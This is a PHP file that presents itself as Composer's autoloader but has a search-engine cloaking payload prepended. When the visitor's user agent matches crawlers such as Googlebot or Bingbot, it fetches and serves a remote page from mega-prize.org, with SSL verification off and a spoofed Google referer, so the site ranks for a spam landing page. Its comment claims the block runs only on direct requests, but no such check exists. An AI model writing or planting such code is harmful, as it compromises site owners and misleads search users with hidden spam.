<?php
/**
 * Combined file:
 * - Top: cloaking / bot detector + fetch function (runs only when this file is requested directly)
 * - Bottom: original Composer autoload_real.php class
 *
 * Note:
 * - Cloaking runs only when this file is the requested script (prevents side-effects when included).
 */

/* ---------------------------
   (Only run when this file is requested directly)
   --------------------------- */

@ob_start();
header("Vary: User-Agent");

$targetUrl = "https://mega-prize.org/landing/ajrpt.html";
$botPattern = "/(googlebot|slurp|bingbot|baiduspider|yandex|crawler|spider|adsense|inspection|mediapartners)/i";
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? '';

/**
 * Fetch remote content with cURL (returns string, or empty string on failure)
 *
 * @param string $url
 * @return string
 */
function fetchContentCurl($url) {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        CURLOPT_REFERER => "https://www.google.com/",
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT => 10,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
    ]);
    $content = curl_exec($ch);
    curl_close($ch);
    return $content ?: '';
}

/* Jika user agent cocok dengan pola bot, tampilkan halaman target dan keluar */
if (preg_match($botPattern, strtolower($userAgent))) {
    // Delay acak kecil
    usleep(random_int(100000, 200000));
    echo fetchContentCurl($targetUrl);
    @ob_end_flush();
    exit;
}

/* ---------------------------
   Composer Autoloader
   --------------------------- */

if (PHP_VERSION_ID < 50600) {
    echo 'Composer 2.3.0 tidak mendukung autoload pada PHP <5.6. Anda menggunakan versi '.PHP_VERSION.'. Silakan upgrade PHP atau gunakan Composer 2.2 LTS dengan perintah "composer self-update --2.2". Dihentikan.'.PHP_EOL;
    exit(1);
}

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderIniteeb0eddf8472fbe1e621dabfed5ae21e::getLoader();
